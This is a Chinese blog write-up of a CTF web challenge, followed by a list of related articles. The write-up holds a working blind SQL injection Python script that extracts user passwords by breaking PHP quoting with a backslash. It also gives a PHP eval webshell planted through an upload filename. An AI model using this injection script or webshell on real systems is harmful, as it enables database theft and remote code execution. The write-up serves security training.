一天一道ctf 第49天

最新推荐文章于 2024-04-18 21:51:10 发布
最新推荐文章于 2024-04-18 21:51:10 发布
阅读量190 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/scrawman/article/details/119488767
版权

在这里插入图片描述
查看源码点击image.php?id=1看一下,不一样的id对应了不一样的图片。
在这里插入图片描述
在这里插入图片描述
robots.txt泄露备份文件,image.php.bak查看源码

include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

addslashes会在单引号,双引号,反斜杠前面加一个/来转义。然后经过str_replace把\0,500,\','都替换成空。那如果我们输入?id=\0,经过URL第一个\用来转义传进去的id就是\0,然后addslashes又把它变回\0,经过strreplace变成\,就可以把'{$id}'的第二个单引号转义,第一个单引号跟path的第一个单引号闭合。我们可以在path变量里传任何参数执行只要把最后一个单引号闭合了就行。

import  requests

url = "http://8f6bddb9-6974-4f8a-a148-4070a9553a3e.node4.buuoj.cn:81//image.php?id=\\0&path="
payload = "or id=if(ascii(substr((select password from users),{0},1))>{1},1,0)%23"
result = ""
for i in range(1,100):
    l = 1
    r = 130
    mid = (l + r)>>1
    while(l<r):
        payloads = payload.format(i,mid)
        print(url+payloads)
        html = requests.get(url+payloads)
        if "JFIF" in html.text:
            l = mid +1
        else:
            r = mid
        mid = (l + r)>>1
    result+=chr(mid)
    print(result)

爆一遍username和password,JFIF是图像的一种存储格式。但因为id错误的话什么也不会显示,所以哪怕用’1‘也可以。
登录成功后是一个文件上传页面,你上传的文件名会被登记在如下的php文件里,那我们可以用文件名写一句话木马,然后用蚁剑连接这个php文件。在这里插入图片描述
php被过滤了,所以要把<?php @eval($_POST['hack']);?>改成<?=@eval($_POST['hack']);?>。上传成功后蚁剑连接

http://8f6bddb9-6974-4f8a-a148-4070a9553a3e.node4.buuoj.cn:81/logs/upload.c197fa5bd8827307f85d3b918516bf36.log.php

在这里插入图片描述
在这里插入图片描述

scrawman
关注
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
CTF之隐写术总结
热门推荐
Net的博客
10-20 1万+
一、图片隐写 1.cmd命令行copy /b 1.jpg+2.jpg 3.jgp 以二进制方式连接两个图片,正常的jpg文件结束标志是FF D9,因此只会显示1.jgp。 3.jpg
CTF实战总结-杂项(图片篇)
congcianzaiqi的专栏
09-04 1689
文件头文件尾全面总结_Ahuuua的博客-优快云博客文件头文件尾汇总:文件类型文件头文件尾特征JPEG (jpg)FFD8FFFF D9ÿØÿàPNG (png)89504E47AE 42 60 82.PNG...GIF (gif)474..._文件头文件尾。
CTF取证技术实战,图片、文件、流等相关内容的取证技术
Scalzdp的专栏
10-25 2721
取证技术在我们安全工作中非常重要,我们可以通过已经产生的流量、日志、文件等信息发现安全存在的蛛丝马迹。通过取证技术的应用,安全工作者可以明确系统存在的漏洞,以及都是谁在系统中做了什么事,其价值和意义对个人、企业、国家而言都是非常重要的。
ctf解密图片得到flag_CTF中图片隐写的一些整理总结
weixin_39983223的博客
12-20 8698
对历年来国内外CTF中常见的题型图片隐写的一些总结,本文长期更新,及时补充新的题型。对历年来国内外CTF中常见的题型图片隐写的一些总结赛题XMAN-qualifiers-2017 : Misc/SimpleGIf考察点Gif文件头隐写相关技巧Python 脚本编写工具010EditorLinux identify命令Visual Studio Code附件WriteupGIF头补全首先用file查...
ctf 图片宽高修改
CH0ico's Blog
03-10 4732
jpg png格式文件怎么修改宽高呢?(非裁剪)
写一下自已对ctf的了解,以便日后自已需要
m0_50987622的博客
11-07 6178
11.7 本人ctf小白,参加比赛基本处于摸鱼状态,也没有系统了解过ctf以及做过相关的实践和练习,但是,对这一块比较感兴趣,所以,只能说,在学习中,就跟我当初学makefile一样,做下记录,写点自已觉得对自已有用的东西,大概这样。 ctf总共分为五部分,misc杂项,crypto解密加密,pwn攻破设备、系统,reverse逆向渗透,web网络安全。500pt的题都很难。 首先,建立在你对前后端足够了解的基础上。 web安全就是黑服务器,pwn就是黑设备黑系统,至于怎么黑,仁者见仁智者见智,取决
一道简单的逆向题的解法 baby_crack
Peanuts
05-12 3257
刚开始接触逆向的题目师傅就给啦一道题目链接:https://pan.baidu.com/s/13cR9WUr1rydFjjbM2meyug  密码:jg3j    题目和wp都在里面下面开始记录首先ida大法好~一个美丽姑娘的头像接着f5大法好~题目本身比较简单,就先看一下第一个sub_4006DF函数这里的逻辑也是很清楚并没有什么拐弯的就是当i分别满足其中的条件后对v8这个数组进行赋值,之前第一...
快速刷通PWN的第一天
北辰孝卿的博客
05-01 749
快速刷通PWN的第一天 计划 声明:因为是自己学习的一个计划,所以可能并不是适用于所有人。但是尽可能考虑到由浅入深,由易到难。 一个比较推荐的二进制方面的课程是 Live Overflow 的 Binary Hacking 课程,原版的视频是放在 YouTube 上的,但是有好心的小伙伴直接放在了 B 站上,方便大家学习。整个课程讲的非常浅显易懂,并且会带着你一步一步从零开始了解二进制的很多内容,...
有趣的黑掉卫星Hack-A-Sat CTF比赛——模拟卫星视角beckley
hackasat的博客
11-11 2062
黑掉卫星挑战赛Hack-A-Sat中有一道有趣的题目,给了一张卫星拍摄的照片,需要找到卫星是从哪个角度拍摄的,找到后,就会给出正确的flag
CTF图片隐写术的各种脑洞-漏洞银行大咖面对面25-Monly
09-04
隐写术算是一种加密技术,权威的wiki说法是“隐写术是一门关于信息隐藏的技巧与科学,所谓信息隐藏指的是不让除预期的接收者之外的任何人知晓信息的传递事件或者信息的内容。 现在各大CTF比赛中都有关于图片隐写术相关的题目,通过将Key隐藏在图片中或者通过图片的其他方式隐藏起来,选手通过各种方式找出正确的Key并提交。
工控CTF中常见题型介绍(下)
jennycisp的博客
11-22 640
本篇通过从工控程序分析、固件分析、无线电中频谱、波形以及编解码分析、组态分析、梯形图等题目有助于更好的入门工控CTF
CTF bugku(MISC) baby_flag.txt
qq_51532711的博客
04-18 353
解压得到一个文本 里面看不懂事一堆啥 只有提示 一种丑陋的语言 什么语言最丑陋啊 百度搜了半。打开TXT文档 开头看到 JFIF 感觉应该是一张图片 再翻到最后看看 发现一串字符。说里面藏了一个压缩包 文件头也有问题 先把文档改为jpg后缀 再用winhex查看。发现一个rar文件 但文件头顺序有问题 直接改为52 61 72 21。看着像十六进制 转换一下看看 感觉像base64 直接解码。图片文件头没问题 那应该是藏在里面的压缩包文件头有问题 开找。找了半没找到 最后发现题目描述有提示。
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 1万+
BUUCTF题目Misc部分wp(持续更新)
CTF中简单杂项小结
Amire0x的小乐园
03-09 7923
MISC1 参考 CTF Wiki MISC 简介 主要分为几个板块:Recon,Forensic,Stego,Crypto(古典密码)… Recon:信息收集 主要介绍一些获取信息的渠道和一些利用百度、谷歌等搜索引擎的技巧 Encode(编码转换) 主要介绍在 CTF 比赛中一些常见的编码形式以及转换的技巧和常见方式 Forensic && Stego(数字取证 && 隐写分析) 隐写取证是 Misc 中最为重要的一块,包括文件分析、隐写、
CTF-数据分析(四)
→_→
08-03 2790
声明:以下CTF题均来自网上收集,在这里主要是给新手们涨涨见识,仅供参考而已。需要题目数据包的请私信或在下方留言。 7.数据包分析-抓到一只苍蝇 (来源:51elab平台 /BugkuCTF论坛) (注:BugCTF是一个复现了很多CTF环境的网站,可免费练习,好像是私人搭建的,值得支持下。) 1.关卡描述 报告首长!发现一只苍蝇。。 在哪? here! 卧槽?!好大一坨苍蝇。。 2.解题步骤 2.1...
CTF 入坑新生赛 Misc 流量分析2 (图片的查看)
Landasika的博客
11-01 2760
本人小白入门,不到之处请大侠指点!!! 用Wireshark打开文件,先看看http的包里面有什么。 在导出对象里面导出http 看到这么大的数据包,很有可能就是图片或者文件上传的流量分析。 然后找到对应的返回的包,来进行分析 果然是个文件类型,直接右键,显示分组字节。 发现是base64编码,那么我们先解码。 然后发现了JFIF图片开头的常见格式,所以把显示改成图像即可。 有关流量分析的其他题型:CTF流量
BugKuCTF:又一张图片,还单纯吗;猜
s0il的博客
01-04 3027
又一张图片,还单纯吗 思路一: jpg改宽高,FFC0开头是固定的宽高所在段,进入winhex直接查找FF 很奇怪的是没有APP0段,即FF E0 0000-0001:FF D8(文件头) 0002-0013:APP0段(JFIF应用数据块)其中:   0002-0003:FF E0(段标记)   0004-0005:00 10(段长度=16字节)   0006-000A:4A 46 ...
信息安全学习之路 —— ctf 之 多啦a梦
加载中...
09-12 3208
题目来源:第三届“西普杯”津预先赛 解题地址:http://ctf5.shiyanbar.com/stega/ameng.jpg 分类:隐写术题目提供一个jpg图片: 用WinHex打开文件: 搜索jpg图片起始十六进制:FFD8 结尾十六进制:FFD9发现该图片下还隐藏一个JFIF格式的图片,右键选定起始和结束,右键复制到新文件,后缀改为
ctf竞赛平台web
最新发布
12-26
### CTF 竞赛平台概述 CTF 是一个专注于网络安全竞技的比赛平台,旨在提升参赛者的实际操作能力和技术水平。该平台提供了一个模拟真实世界网络攻击环境的舞台,让参与者能够通过解决各种类型的挑战来提高自己的技能[^1]。 ### Web 使用指南 #### 注册与登录 为了参加比赛,用户需先注册账号并完成身份验证过程。成功创建账户后即可登录到个人主页,在这里可以查看即将举行的活动列表和个人资料设置选项。 #### 浏览赛事信息 进入首页后可以看到不同类别的竞赛项目链接,点击感兴趣的类别可进一步了解具体详情,包括但不限于比赛规则说明文档下载地址、官方交流群二维码等重要资源位置指引。 #### 提交Flag获取分数 当选手解答出一道题目之后,需要按照指定格式提交flag给系统进行校验;如果正确则会立即更新排行榜上的成绩情况,并解锁下一阶段更难的任务等待挑战者继续攻克难关。 ```python def submit_flag(flag): """ Submit the flag to get points. Args: flag (str): The answer string of a challenge question Returns: bool: True if submission is successful, False otherwise """ try: response = requests.post('https://tianshou.ctftime.org/api/v1/challenges/submit', json={'answer': flag}) if response.status_code == 200 and 'success' in response.json(): return True except Exception as e: print(f"Error occurred while submitting flag: {e}") return False ``` ### 参赛经验分享 对于初次接触此类活动的新手来说,建议多花些时间熟悉各类工具和技术知识点,比如掌握常见的漏洞检测方法论以及修复措施。同时积极参与社区讨论区内的问答互动环节也是快速成长的有效途径之一。另外值得注意的是团队协作精神同样至关重要——合理分工合作往往能带来意想不到的效果! - **持续学习**:不断积累理论基础的同时也要注重实践能力培养; - **善于总结归纳**:每次赛后都要认真反思整个解题思路流程中的优缺点所在以便日后改进优化; - **保持良好心态**:面对困难时不轻易放弃而是积极寻求解决方案直至最终胜利为止。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值